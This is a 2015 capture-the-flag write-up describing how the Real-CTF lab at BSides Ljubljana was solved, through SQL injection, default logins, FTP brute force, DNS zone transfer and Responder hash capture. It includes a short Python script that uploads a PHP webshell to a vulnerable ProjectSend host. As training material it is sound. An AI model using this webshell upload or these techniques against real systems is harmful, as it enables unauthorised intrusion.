Security BSides Ljubljana Real-CTF

In the spirit of Security BSides Ljubljana 2015 there was CTF contest titled Real-CTF. Why choose such a title? Because it was designed like a virtual company with lots of vulnerabilities. Of course, the number and impact of vulnerabilities were enhanced so that the playground area was spread in X in Y axis of fun. Here is a short write up.

Let’s start with a network diagram.

 network

There were 23 flags to capture. The flags could have been obtained by discovering and hacking vulnerabilities of the virtual environment. First 7 flags and one additional were on starting point of the competition (192.168.66.6) in the form of riddles to solve and some basic information disclosure vulnerabilities like for example the presence of Readme.html, a browsable directory and a backup file that is created if using some editors (index.php~).

Before going deeper we need to apologize to all the hackers that were trying to break the Honeypot at IP address 192.168.66.19. It was a waste of time.

Next interesting hosts were on IP addresses 192.168.66.8 and 192.168.66.10.  Host at IP address 192.166.66.8 had a robots file with a flag and a hint. The robots.txt was restricting the URL http://192.168.66.8/user:1. So if hackers enumerated the users they would discover that on http://192.168.66.8/user:10 a flag was hidden (user enumeration vulnerability). The host was also vulnerable to SQL injection. URL http://192.168.66.8/user:10′ triggered an exception. If SQLi successfully exploited the flag was found in the database CMS inside table CMSUSERS.

On host at IP address 192.168.66.10 was a vulnerable version of ProjectSend. Anybody that updated metasploit should found the exploit at exploit/unix/webapp/projectsend_upload_exec. Of course, the host could be exploited manually by writing a simple script. Here is a python example that uploads a simple PHP Webshell.

from poster.encode import multipart_encode

from poster.streaminghttp import register_openers

import urllib2

register_openers()

datagen, headers = multipart_encode({"file": open("./simple-backdoor.php")})

request = urllib2.Request("http://192.168.66.10/process-upload.php?name=shell.php", datagen, headers)

print urllib2.urlopen(request).read()

 

Additional flags were hidden on host with IP address 192.168.66.11 where FTP server was listening and a SNMP service with default community string “public” was enabled. If hackers had brute forced the FTP server with username “admin” and the rockyou.txt password list which comes with Kali Linux, access would be granted fast. After accessing FTP server there was a binary file that needed to be reverse engineered.  Unlocking the binary gave an additional flag.

The next big step that gave wings was a host on IP address 192.168.66.15 with DNS zone transfer enabled. The zone transfer revealed additional virtual hosts and an internal IP address was also leaked. Figure bellow shows a successful zone transfer.

dnszone

After updating local host file with additional virtual hosts at IP addresses 192.168.66.7 and 192.168.66.9, two new web applications could be accessed. At host 192.168.66.7 there was a vulnerable version of CMS mini. But just accessing http://web1.real-ctf.com could gave hackers 2 new flags. One was hidden inside HTML code and the other was a base64 encoded image. If hackers decoded the image additional information were revealed.

 ctf20

Back to vulnerable CMS mini version. At  http://web1.real-ctf.com/admin hackers could login to admin interface by using default username “admin” and password “password”. After getting access hackers got an additional flag that could be also obtained by accessing the URL http://web1.real-ctf.com/pages/dir.list. This version of CMS mini allowed hackers to upload arbitrary files. By uploading a simple PHP Webshell and looking around on the file system an additional flag was discovered.

Now let’s talk about host at IP address 192.168.66.9. If hackers accessed URL address http://web3.real-ctf.com the virtual host would serve page below.

web3

The page was custom made and contained a bypass authentication vulnerability. It had something to do with URL (GET parameters) modification and MD5. By solving the puzzle an additional flag was obtained. But wait, web3.real-ct.com virtual host contained a backup directory with commit.php subpage. By committing some random text an error was displayed like shown below.

commit

Looks familiar. Yes, it is a direct C code compiler application that compiles and runs your C code. And yes, for hackers we made the stack executable, so that they could google for some C shell code. Successful exploitation and looking around the file system gave another flag.

Now let’s come to the final act. I don’t know about you, but we prefer getting inside a company if conducting a penetration test. Playing around in DMZ zone gives a lot of useful information, but hacker’s goal should be other network zones. For example Server zone is looking very promising. But because of time limitation the virtual environment contained only DMZ and User zone. Flag 20 gave hackers an idea about network structure and a hint about the attacker. It looked like the attacker was already inside User zone. There was also a riddle written down everywhere.

My name is master and my IP is my name. You want to know my password?

Of course…

The answer is 0, 1, 1, 2, 3, 5, 8, 13, 21, 34,…

In the language of internet the name is the DNS system. Remember DNS zone transfer and the internal IP address that was leaked? Yes, this is the attacker IP address. The first part of the riddle indicated that the username was master, the second part was the IP address of the attacker and the third part was a sequence of numbers. This sequence was nothing else but the Fibonacci sequence. So the third part of the riddle was the password which was fibonacci. Now hackers should have had information about accessing the attacker machine except the service and the port. If hackers successfully exploited some of the host in DMZ zone they were able to scan for open ports on attacker machine. After some time there was port 2222 found to be open. A closer look revealed that on port 2222 a SSH server was waiting for incoming connections.

Now that the hackers were on the attacker’s machine it was almost game over. First they noticed a tool named Responder. Responder enabled hackers to grab hashes coming from Windows hosts. After running Responder on attacker’s machine very soon a hash was grabbed, because in User zone a Windows machine was constantly emitting hashes.  Cracking the hash with a tool like John gave hackers the final flag 23.

Objavil Danijel Grah, dne9.4.2015